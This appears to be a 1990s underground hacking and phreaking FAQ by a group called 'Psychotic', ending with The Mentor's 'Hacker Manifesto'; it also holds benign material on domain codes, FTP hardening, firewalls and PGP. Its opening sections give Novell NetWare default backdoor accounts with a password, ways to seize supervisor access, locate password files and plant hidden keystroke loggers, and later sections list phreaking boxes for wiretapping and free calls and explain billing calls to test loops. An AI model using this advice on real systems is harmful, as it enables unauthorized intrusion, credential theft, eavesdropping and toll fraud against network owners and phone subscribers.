FAXWORKS Attaching a dedicated fax modem unit to the network
TEST A test user account for temp use
ARCHIVIST Palidrome default account for backup
CHEY_ARCHSVR An account for Arcserve to login to the server from
from the console for tape backup. Version 5.01g's
password was WONDERLAND. Delete the Station
Restrictions and use SUPER.EXE to toggle this
account and you have an excellent backdoor.
WINDOWS_PASSTHRU Although not required, per the Microsoft Win95
Resource Kit, Ch. 9 pg. 292 and Ch. 11 pg. 401 you
need this for resource sharing without a password.

Q. How can I gain supervisor access to Novell Netware?

A. Taken from the Novell Netware FAQ.
The secret method is the method of using a DOS-based sector editor to edit the
entry in the FAT, and reset the bindery to default upon server reboot. This gives
you Supervisor and Guest with no passwords. The method was taught in case you
lost Supervisor on a Netware 2.15 server and you had no supe equivalent accounts
created. It also saves the server from a wipe and reboot in case the Supervisor account is corrupt, deleted, or trashed.


Q. How do I access the password file for Novell?

A. access to the password file in Netware is not like Unix - the password file isn't in the open. All objects and their properties are kept in the bindery files on 2.x and 3.x, and kept in the NDS
database in 4.x. An example of an object might be a printer, a group, an individual's account etc. An example of an object's properties might include an account's password or full user name, or a group's member list or full name. The bindery files attributes (or flags) in 2.x and 3.x are Hidden
and System, and these files are located on the SYS: volume in the SYSTEM subdirectory. Their names are as follows:

Netware version File Names
--------------- ----------
2.x NET$BIND.SYS, NET$BVAL.SYS
3.x NET$OBJ.SYS, NET$PROP.SYS, NET$VAL.SYS

The NET$BVAL.SYS and NET$VAL.SYS are where the passwords are actually located
in 2.x and 3.x respectively.


Q. How do I crack a Novell password?

A. Taken from the Novell Netware Hack FAQ.

If Intruder Detection is off, you can use a "brute force" password cracker.

Encrypted passwords is Novell's way of protecting passwords from sniffers.
Since older versions of Netware (2.15c) sent passwords as plain text over the
wire, a sniffer could see the password as it went by. To secure things,
Novell gave the administrator a way to control this. Later versions of the
LOGIN.EXE program would encrypt the password before transmitting it across
the wire to the server. But before this could happen, the shell (NETX) had
to be updated. Since some locations had to have older shells and older
versions of LOGIN.EXE to support older equipment, the administrator has the
option of allowing unencrypted passwords to access the server. This is done
by typing SET ALLOW UNENCRYPTED PASSWORDS=ON at the console or by adding it
to the AUTOEXEC.NCF. The default is OFF, which means NOVELBFH could be beeping
the server console every attempt! Fortunately most sites turn this switch on to
support some old device.

If you have access to the console, either by standing in front of it or by
RCONSOLE, you can use SETSPASS.NLM, SETSPWD.NLM or SETPWD.NLM to reset passwords.
Just load the NLM and pass it command line parameters:

NLM Account(s) reset Netware version(s) supported
------------ ----------------- ----------------------------
SETSPASS.NLM SUPERVISOR 3.x
SETSPWD.NLM SUPERVISOR 3.x, 4.x
SETPWD.NLM any valid account 3.x, 4.x

If you can plant a password catcher or keystroke reader, you can get them
this way. The LOGIN.EXE file is located in the SYS:LOGIN directory, and
normally you will not have access to put a file in that directory. The best
place to put a keystroke capture program is in the workstation's path, with
the ATTRIB set as hidden. The advantage is that you'll get the password and
Netware won't know you swiped it. The disadvantage is getting access to the
machine to do this. The very best place to put one of these capture programs
is on a common machine, like a pcAnywhere box, which is used for remote access.
Many locations will allow pcAnywhere access to a machine with virtually no
software on it, and control security access to the LAN by using Netware's
security features. Uploading a keystroke capture program to a machine like
this defeats this.

Q. What are the domain codes?

A. Below is the current list of domain codes.
AD Andorra
AE United Arab Emirates
AF Afghanistan
AG Antigua and Barbuda
AI Anguilla
AL Albania
AM Armenia
AN Netherland Antilles
AO Angola
AQ Antarctica
AR Argentina
AS American Samoa
AT Austria
AU Australia
AW Aruba
AZ Azerbaidjan
BA Bosnia-Herzegovina
BB Barbados
BD Banglades
BE Belgium
BF Burkina Faso
BG Bulgaria
BH Bahrain
BI Burundi
BJ Benin
BM Bermuda
BN Brunei Darussalam
BO Bolivia
BR Brazil
BS Bahamas
BT Buthan
BV Bouvet Island
BW Botswana
BY Belarus
BZ Belize
CA Canada
CC Cocos (Keeling) Islands
CF Central African Republic
CG Congo
CH Switzerland
CI Ivory Coast
CK Cook Islands
CL Chile
CM Cameroon
CN China
CO Colombia
CR Costa Rica
CS Czechoslovakia
CU Cuba
CV Cape Verde
CX Christmas Island
CY Cyprus
CZ Czech Republic
DE Germany
DJ Djibouti
DK Denmark
DM Dominica
DO Dominican Republic
DZ Algeria
EC Ecuador
EE Estonia
EG Egypt
EH Western Sahara
ES Spain
ET Ethiopia
FI Finland
FJ Fiji
FK Falkland Islands (Malvinas)
FM Micronesia
FO Faroe Islands
FR France
FX France (European Territory)
GA Gabon
GB Great Britain (UK)
GD Grenada
GE Georgia
GH Ghana
GI Gibraltar
GL Greenland
GP Guadeloupe (French)
GQ Equatorial Guinea
GF Guyana (French)
GM Gambia
GN Guinea
GR Greece
GT Guatemala
GU Guam (US)
GW Guinea Bissau
GY Guyana
HK Hong Kong
HM Heard and McDonald Islands
HN Honduras
HR Croatia
HT Haiti
HU Hungary
ID Indonesia
IE Ireland
IL Israel
IN India
IO British Indian Ocean Territory
IQ Iraq
IR Iran
IS Iceland
IT Italy
JM Jamaica
JO Jordan
JP Japan
KE Kenya
KG Kirgistan
KH Cambodia
KI Kiribati
KM Comoros
KN Saint Kitts Nevis Anguilla
KP North Korea
KR South Korea
KW Kuwait
KY Cayman Islands
KZ Kazachstan
LA Laos
LB Lebanon
LC Saint Lucia
LI Liechtenstein
LK Sri Lanka
LR Liberia
LS Lesotho
LT Lithuania
LU Luxembourg
LV Latvia
LY Libya
MA Morocco
MC Monaco
MD Moldavia
MG Madagascar
MH Marshall Islands
ML Mali
MM Myanmar
MN Mongolia
MO Macau
MP Northern Mariana Islands
MQ Martinique (French)
MR Mauritania
MS Montserrat
MT Malta
MU Mauritius
MV Maldives
MW Malawi
MX Mexico
MY Malaysia
MZ Mozambique
NA Namibia
NC New Caledonia (French)
NE Niger
NF Norfolk Island
NG Nigeria
NI Nicaragua
NL Netherlands
NO Norway
NP Nepal
NR Nauru
NT Neutral Zone
NU Niue
NZ New Zealand
OM Oman
PA Panama
PE Peru
PF Polynesia (French)
PG Papua New
PH Philippines
PK Pakistan
PL Poland
PM Saint Pierre and Miquelon
PN Pitcairn
PT Portugal
PR Puerto Rico (US)
PW Palau
PY Paraguay
QA Qatar
RE Reunion (French)
RO Romania
RU Russian Federation
RW Rwanda
SA Saudi Arabia
SB Solomon Islands
SC Seychelles
SD Sudan
SE Sweden
SG Singapore
SH Saint Helena
SI Slovenia
SJ Svalbard and Jan Mayen Islands
SK Slovak Republic
SL Sierra Leone
SM San Marino
SN Senegal
SO Somalia
SR Suriname
ST Saint Tome and Principe
SU Soviet Union
SV El Salvador
SY Syria
SZ Swaziland
TC Turks and Caicos Islands
TD Chad
TF French Southern Territory
TG Togo
TH Thailand
TJ Tadjikistan
TK Tokelau
TM Turkmenistan
TN Tunisia
TO Tonga
TP East Timor
TR Turkey
TT Trinidad and Tobago
TV Tuvalu
TW Taiwan
TZ Tanzania
UA Ukraine
UG Uganda
UK United Kingdom
UM US Minor Outlying Islands
US United States
UY Uruguay
UZ Uzbekistan
VA Vatican City State
VC Saint Vincent and Grenadines
VE Venezuela
VG Virgin Islands (British)
VI Virgin Islands (US)
VN Vietnam
VU Vanuatu
WF Wallis and Futuna Islands
WS Samoa
YE Yemen
YU Yugoslavia
ZA South Africa
ZM Zambia
ZR Zaire
ZW Zimbabwe
ARPA Old style Arpanet
COM US Commercial
EDU US Educational
GOV US Government
INT International
MIL US Military
NATO Nato field
NET Network
ORG Non-Profit



Q. What is phreaking?

A. Phreaking is anything illegal that has to do with phones and phone lines.

Q. How do I start phreaking?

A. You should start by learning about boxes and reading up on different types of phreaking.

Q. What kind of boxes are there?

A.Below is a list of the most common boxes and what they do.

Acrylic Box - Steal Three-Way-Calling and Call Waiting.
Aero Box - Make free fone calls from Payfones.
Aqua Box - Drain voltage from a FBI Lock In Trace call.
Beige Box - Replicates a line mens hand-set.
Black Box - Allows the calling party not to get charged for the call they place.
Blast Box - Fone Microphone Amplifier.
Blotto Box - Shorts every fone out in the area.
Blue Box - Utilizing 2600Hz tones for free fone calls.
Brown Box - Creates a party line from 2 existing fone lines.
Bud Box - Used to tap into your neighbors fone line.
Busy Box - Used to kill the dial tone on someone's fone.
Chartreuse Box - Use the electricty from your phone for other things.
Cheese Box - Turns your fone into a Payfone.
Chrome Box - Lets you manipulate traffic signals via remote control.
Clear Box - Used to make free calls on Fortress Fones.
Copper Box - Causes cross-talk interference on an extender.
Crimson Box - Acts as a 'Hold' button for your fone.
Dark Box - REroutes outgoing or incomming calls to another fone.
Dayglo Box - Allows you to connect to your neighbors fone line.
Ditto Box - Allows you to evesdrop on another fone line.
Divertor Box - REroutes outgoing or incomming calls to another fone.
DLOC Box - Lets you confrence 2 fone lines (other than your own).
Gold Box - Allows you to trace a call or tell if its being traced.
Green Box - Lets you make the Coin Collect, Coin Return, and Ringback tones.
Jack Box - A touch-tone keypad.
Light Box - An AM Transmitter.
Lunch Box - Used to tap into your neighbors fone line.
Magenta Box - Connects one remote fone line to another remote fone line.
Mauve Box - Lets you fone tap without cutting into the fone line.
Neon Box - An external microphone.
New Gold Box - A new updated version of the Gold Box.
Noise Box - Creates line noise.
Olive Box - Used as an external ringer.
Paisley Box - A combination of almost all the boxes there are.
Pandora Box - Creates a high intensity tone which can cause pain. Good for pranking.
Party Box - Lets you make a party line from 2 fone lines.
Pearl Box - A tone generator.
Pink Box - Lets you hook 2 seprate fone lines together and have 3 way calling.
Purple Box - A fone hold button.
Rainbow Box - Kills a trace by putting 120v into the fone line.
BoRed x - Lets you make free calls from a payfone by producing the coins tones.
Rock Box - Adds music to your fone line.
Scarlet Box - Silver Box - Adds DTMF A, B, C, & D priority tones to your line.
Slush Box - Can be installed at places of business that have standard multi-line fones.
Static Box - Keep voltage on a fone line high.
Switch Box - Adds hold, indicator lights, confrence, etc.
Tan Box - Line activated telefone recorder.
Tron Box - Reverse the phase of power to your house, and make your meter run slower.
Urine Box - Makes a disturbance between the ring and tip wires in someones fone.
Violet Box - Keeps a payfone from hanging up.
White Box - A portable DTMF keypad.
Yellow Box - Add an extention fone.

Q. How do I make a box?

A. Each box has a sepperate plan to set it up. Just do a netsearch for phreaking or boxes and you can find all the plans you need.

Q. What is a loop?

A. This FAQ answer is excerpted from:
ToneLoc v0.99 User Manual by Minor Threat & Mucho Maas
Loops are a pair of phone numbers, usually consecutive, like 836-9998 and 836-9999. They are
used by the phone company for testing. What good do loops do us? Well, they are cool in a few
ways. Here is a simple use of loops. Each loop has two ends, a 'high' end, and a 'low' end. One end
gives a (usually) constant, loud tone when it is called. The other end is silent. Loops don't usually
ring either. When BOTH ends are called, the people that called each end can talk through the loop.
Some loops are voice filtered and won't pass anything but a constant tone; these aren't much use to
you. Here's what you can use working loops for: billing phone calls! First, call the end that gives the loud tone. Then if the operator or someone calls the other end, the tone will go quiet. Act like the phone just rang and you answered it ... say "Hello", "Allo", "Chow", "Yo", or what the fuck ever. The operator thinks that she just called you, and that's it! Now the phone bill will go to the loop, and your local RBOC will get the bill! Use this technique in moderation, or the loop may go down. Loops are probably most useful when you want to talk to someone to whom you don't want to give your phone number.

Q. How do I set up an anonymous FTP?

A. Taken from the Internet Security Systems, Inc. text on setting up an anonymous ftp.
- 1.Build a statically linked version of ftpd and put it in ~ftp/bin. Make sure it's owned by root.
- 2.Build a statically linked version of /bin/ls if you'll need one. Put it in ~ftp/bin. If you are on a Sun, and need to build one, there's a ported version of the BSD net2 ls command for SunOs
on ftp.tis.com: pub/firewalls/toolkit/patches/ls.tar.Z Make sure it's owned by root.
- 3.Chown ~ftp to root and make it mode 755 THIS IS VERY IMPORTANT
- 4.Set up copies of ~ftp/etc/passwd and ~ftp/etc/group just as you would normally, EXCEPT
make 'ftp's home directory '/' -- make sure they are owned by root.
- 5.Write a wrapper to kick ftpd off and install it in /etc/inetd.conf The wrapper should look
something like: (assuming ~ftp = /var/ftp)
main()

{

if(chdir("/var/ftp")) {

perror("chdir /var/ftp");

exit(1);

}

if(chroot("/var/ftp")) {

perror("chroot /var/ftp");

exit(1);

}

/* optional: seteuid(FTPUID); */

execl("/bin/ftpd","ftpd","-l",(char *)0);

perror("exec /bin/ftpd");

exit(1);

}
Options:
You can use 'netacl' from the toolkit or tcp_wrappers to achieve the same effect.
We use 'netacl' to switch so that a few machines that connect to the FTP service *don't* get
chrooted first. This makes transferring files a bit less painful.
You may also wish to take your ftpd sources and find all the places where it calls seteuid()
and remove them, then have the wrapper do a setuid(ftp) right before the exec. This means
that if someone knows a hole that makes them "root" they still won't be. Relax and imagine
how frustrated they will be.
If you're hacking ftpd sources, I suggest you turn off a bunch of the options in ftpcmd.y by
unsetting the "implemented" flag in ftpcmd.y. This is only practical if your FTP area is
read-only.
- 6.As usual, make a pass through the FTP area and make sure that the files are in correct modes
and that there's nothing else in there that can be executed.
- 7.Note, now, that your FTP area's /etc/passwd is totally separated from your real /etc/passwd.
This has advantages and disadvantages.
- 8.Some stuff may break, like syslog, since there is no /dev/log. Either build a version of ftpd
with a UDP-based syslog() routine or run a second syslogd based on the BSD Net2 code,
that maintains a unix-domain socket named ~ftp/dev/log with the -p flag.

Q. What are some ways I can secure a network?

A. Taken from the Internet Security Systems text on securing a network.
1. Well first of all you should know what type of resources that you're trying to protect: CPU, files, storage devices phone lines, etc...
2. Determine the host-specific security measures needed. Password protection, file
encryption, firewall, etc...
Determine who the computer systems must be defended.
Determine the likelihood of a threat.
Implement measures to protect network resource.

3. Consider the corporate budget when planning for Internet Security.

4. Design a Security Policy that describes your organization's network security
concerns. This policy should take into account the following:

Network Security Planning
Site Security Policy
Risk Analysis
Risk analysis involves determining the following:
What you need to protect
What you need to protect it from
How to protect it
Estimating the risk of losing the resource
Estimating the importance of the resource

5. Consider the following factors to determine who will grant access to services on your
networks:
Will access to services be granted from a central point?
What methods will you use to create accounts and terminate access?

6. Design and Implement Packet Filter Rules

7. Ensure your Firewall has the following properties:
All traffic from inside to outside, as well as outside to inside must pass through the
firewall.
Allow only authorized traffic as defined by your corporate security policy be
passed through the firewall.
Ensure the firewall is immune to penetration.

8. Educate users about password protection:
Educating users not to use passwords that are easy to guess.
Ensuring the password lengths are adequate.
Running a password guesser.
Requiring the use of a password generator.
Always using a mixture of upper- and lowercase characters.
Always using at least one or two non-alphanumeric characters.
Never using dictionary words or ones spelled backwards.
Never using a portion or variation of a proper name, address or anything that
could obviously identify you (the user).

9. Security-related organizations play an integral role in the development and
deployment of Internet technologies. Keep abreast of the latest in security-related
activities by visiting their Web sites. Here are some key security-rated organizations
which aid corporations such as yours in keeping the Internet a safer place to compute:
ACM/SIGSAC at gopher://gopher.acm.org/.
CERT (a 24-hour Computer Emergency Response Team) at:
ftp://info.cert.org/pub/cert_faq and
http://www.sei.cmu.edu/SEI/programs/cert.html.
CIAC (U.S. Department of Energy's Computer Incident Advisory
Capability) at: http://ciac.llnl.gov/
CPSR (Computer Professionals for Social Responsibility) at:
http://cpsr.org.home
EFF (Electronic Frontier Foundation) at: http://www.eff.org/
EPIC (Electronic Privacy Information Center) at: http:/epic.org/
FIRST (Forum of Incident Reponse and Security Teams) at:
http://first.org/first/
Internet Society at http://www.isoc.org/

Q. What is a "rainbow book?"

A. Rainbow Books are books on security. The current book listing is listed below.

Orange Book- Department of Defense Trusted Computer System Evaluation Criteria.
Green Book- Department of Defense Password Management Guideline.
Yellow Book- Guidance for Applying the Department of Defense Trusted Computer System Evaluation Criteria in Specific Environments.
Tan Book- A Guide to Understanding Audit in Trusted Systems.
Bright Blue Book- A Guide for Vendors.
Neon Orange Book- A Guide to Understanding Discretionary Access Control in Trusted Systems.
Teal Green Book- Glossary of Computer Security Terms.
Red Book- Trusted Network Interpretation of the Trusted Computer System Evaluation Criteria.
Burgandy Book- A Guide to Understanding Design Documentation in Trusted Systems.
Dark Lavender Book- A Guide to Understanding Trusted Distribution in Trusted Systems.
Venice Blue Book- Computer Security Subsystem Interpretation of the Trusted Computer System Evaluation Criteria.
Aqua Book- Department of Defense Trusted Computer System Evaluation Criteria A Guide to Understanding Security Modeling in Trusted Systems.
Dark Red Book- Guidance for Applying the Trusted Network Interpretation.
Pink Book- Department of Defense Trusted Computer System Evaluation Criteria Rating Maintenance Phase.
Purple Book- Department of Defense Trusted Computer System Evaluation Criteria Guidelines for Formal Verification Systems.
Brown Book- Department of Defense Trusted Computer System Evaluation Criteria A Guide to Understanding Trusted Facility Management.
Yellow-Green Book- Department of Defense Trusted Computer System Evaluation Criteria Guidelines for Writing Trusted Facility Manuals.
Light Blue Book- Department of Defense Trusted Computer System Evaluation Criteria A Guide to Understanding Identification and Authentication in Trusted Systems.
Blue Book- Department of Defense Trusted Computer System Evaluation Criteria Trusted Product Evaluation Questionnaire.
Grey Book-Department of Defense Trusted Computer System Evaluation Criteria Trusted Unix Working Group (TRUSIX) Rationale for Selecting Access Control List Features for the Unix System.
Lavender Book- Department of Defense Trusted Computer System Evaluation Criteria Trusted Data Base Management System Interpretation of the Trusted Computer System Evaluation Criteria.
Bright Orange Book- Department of Defense Trusted Computer System Evaluation Criteria A Guide to Understandng Security Testing and Test Documentation in Trusted Systems.
Hot Peach Book- Department of Defense Trusted Computer System Evaluation Criteria A Guide to Writing the Security Features User's Guide for Trusted Systems.
Turquoise Book- Department of Defense Trusted Computer System Evaluation Criteria A Guide to Understanding Information System Security Officer Responsibilities for Automated Information Systems.
Violet Book- Department of Defense Trusted Computer System Evaluation Criteria Assessing Controlled Access Protection.
Light Pink Book- Department of Defense Trusted Computer System Evaluation Criteria A Guide to Understanding Covert Channel Analysis of Trusted Systems.
C1 Technical Report-001- Department of Defense Trusted Computer System Evaluation Criteria Computer Viruses: Prevention, Detection, and Treatment.
C Technical Report 79-91- Department of Defense Trusted Computer System Evaluation Criteria Integrity in Automated Information Systems.
C Technical Report 39-92- Department of Defense Trusted Computer System Evaluation Criteria The Design and Evaluation of INFOSEC systems: The Computer Security Contributions to the Composition Discussion.
NTISSAM COMPUSEC/1-87- Department of Defense Trusted Computer System Evaluation Criteria Advisory Memorandum on Office Automation Security Guideline.



Q. What is a firewall?

A. A firewall is a system or group of systems that enforces an access control policy between two networks. The actual means by which this is accomplished varies widely, but in principle, the firewall can be thought of as a pair of mechanisms: one which exists to block traffic, and the other which exists to permit traffic. Some firewalls place a greater emphasis on blocking traffic, while others emphasize permitting traffic. Probably the most important thing to recognize about a firewall is that it implements an access control policy. If you don't have a good idea what kind of access you want to permit or deny, or you simply permit someone or some product to configure a
firewall based on what they or it think it should do, then they are making policy for your organization as a whole.


Q. How can I use PGP to benefit me?

A. PGP is easy to use, it does give you enough rope so that you can hang yourself. You should
become thoroughly familiar with the various options in PGP before using it to send serious
messages. For example, giving the command pgp -sat <filename> will only sign a message, it
will not encrypt it. Even though the output looks like it is encrypted, it really isn't. Anybody in the
world would be able to recover the original text.

Q. What is a sniffer?

A. Taken from the Sniffer FAQ.
Unlike telephone circuits, computer networks are shared communication channels. It is simply too expensive to dedicate local loops to the switch (hub) for each pair of communicating computers. Sharing means that computers can receive information that was intended for other machines. To capture the information going over the network is called sniffing.

The most popular way of connecting computers is through ethernet. Ethernet protocol works by sending packet information to all the hosts on the same circuit. The packet header contains the proper address of the destination machine. Only the machine with the matching address is suppose to accept the packet. A machine that is accepting all packets, no matter what the packet header says, is said to be in promiscuous mode.

Because, in a normal networking environment, account and password information is passed along
ethernet in clear-text, it is not hard for an intruder once they obtain root to put a machine into
promiscuous mode and by sniffing, compromise all the machines on the net.


Q. What is Psychotic?

A. I would describe Psychotic as more of a proffessional group rather than just a hacking clan. We think about money first and hacking second, even though I'm sure that most of you have seen a few of our hacking projects...

Q. Is psychotic looking for new members?

A. Well as of now we aren't looking for any additions to our staff, but stay posted we might decide that we need new members.

Q. What is Psychosis?

A. Psychosis is a personal project taken up by Virtual Circuit. It's an award that he gives out to hackers that have done something to stand out(good webpage, revealed exploits, etc.). If you think that you should receive the award you can mail him about it. But I can tell you now that the award isn't easy to get.

Q. What is the "Devil's Gateway?"

A. The "Devil's Gateway" is a personal project taken up by VooDooHex. It's kind of like an information retrival guild, but yet it's still like a group. If you are interested in joining the Devil's Gateway you should mail VooDoo about it.

Q. Where can I find some good resources on hacking and phreaking?

A. Well we aren't much for links but you should check the Psychosis page for his webpage award winners. He picks only the best.

Q. Who are all the members in Psychotic?

A. We would like to stay anonymous. But you will see a members name every now and then.

Q. What are Psychotic's offered services?

A. Psychotic has many different services, security testing, webpage design, graphic design, sponsoring, pop accounts, and webpage hosting. Each service has a different price. You can read more about our services on the services section of the page.


This is only the fisrt copy of our FAQ. We will be updating and adding information and questions to it as often as possible. I would appriciate if you would distribute and spready this text as much as you can. We don't want people asking us these questions anymore. Have fun and keep the underground alive.


Another one got caught today, it's all over the papers. "Teenager Arrested in Computer
Crime Scandal", "Hacker Arrested after Bank Tampering"... Damn kids. They're all
alike. But did you, in your three-piece psychology and 1950's technobrain, ever take a
look behind the eyes of the hacker? Did you ever wonder what made him tick, what forces
shaped him, what may have molded him? I am a hacker, enter my world... Mine is a world
that begins with school... I'm smarter than most of the other kids, this crap they teach us
bores me... Damn underachiever.They're all alike. I'm in junior high or high school. I've
listened to teachers explain for the fifteenth time how to reduce a fraction. I understand it.
"No, Ms. Smith, I didn't show my work. I did it inmy head..." Damn kid. Probably copied
it. They're all alike. I made a discovery today. I found a computer. Wait a second, this is
cool. It does what I want it to. If it makes a mistake, it's because I screwed it up. Not
because it doesn't like me... Or feels threatened by me.. Or thinks I'm a smart ass.. Or
doesn't like teaching and shouldn't be here... Damn kid. All he does is play games. They're
all alike. And then it happened... a door opened to a world... rushing through the phone line
like heroin through an addict's veins, an electronic pulse is sent out, a refuge from the
day-to-day incompetencies is sought... a board is found. "This is it... this is where I
belong..." I know everyone here... even if I've never met them, never talked to them, may
never hear from them again... I know you all... Damn kid. Tying up the phone line again.
They're all alike... You bet your ass we're all alike... we've been spoon-fed baby food at
school when we hungered for steak... the bits of meat that you did let slip through were
pre-chewed and tasteless. We've been dominated by sadists, or ignored by the apathetic.
The few that had something to teach found us willing pupils, but those few are like drops of
water in the desert. This is our world now... the world of the electron and the switch, the
beauty of the baud. We make use of a service already existing without paying for what
could be dirt-cheap if it wasn't run by profiteering gluttons, and you call us criminals. We
explore... and you call us criminals. We seek after knowledge... and you call us criminals.
We exist without skin color, without nationality, without religious bias... and you call us
criminals. You build atomic bombs, you wage wars, you murder, cheat, and lie to us and try
to make us believe it's for our own good, yet we're the criminals. Yes, I am a criminal. My
crime is that of curiosity. My crime is that of judging people by what they say and think,
not what they look like. My crime is that of outsmarting you, something that you will never
forgive me for. I am a hacker, and this is my manifesto. You may stop this individual,but
you can't stop us all... after all, we're all alike.

+++The Mentor+++

Read more »